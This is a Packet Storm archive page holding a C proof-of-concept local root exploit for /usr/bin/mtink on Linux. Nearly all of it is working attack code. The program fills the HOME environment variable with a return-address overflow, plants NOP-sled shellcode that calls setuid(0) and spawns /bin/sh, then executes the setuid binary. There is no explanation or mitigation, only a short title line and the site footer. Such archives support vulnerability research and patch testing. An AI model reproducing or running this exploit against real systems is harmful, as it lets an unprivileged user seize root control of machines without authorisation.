/usr/bin/mtink local root exploit which overflows the HOME environment variable. For all versions of linux, especially Debian and Gentoo.
32529ff089bfc051896eac94522d20dc25f64f80adf2a078894bed36c27dd87d//icesk! whats up
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define bsize 1400
char buffer[bsize];
char shel[2000];
char *get_sp() {
asm("movl %esp, %eax");
}
int main(int n, char **v) {
int i, off, align;
align = 0;
if (n > 1) off = atoi(v[1]); //nice code!
for(i=0;i<align;i++) buffer[i] = 0x41;
for(i=align;i<(bsize-4);i+=4) *(char **)&buffer[i] = get_sp()-off;
setenv("HOME", buffer, 1);
memset(shel, 0x90, 2000);
for(i=0;i<strlen(shellcode);i++) shel[(i+2000-strlen(shellcode))]=shellcode[i];
setenv("shellcode", shel, 1);
execl("/usr/bin/mtink", "/usr/bin/mtink", 0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed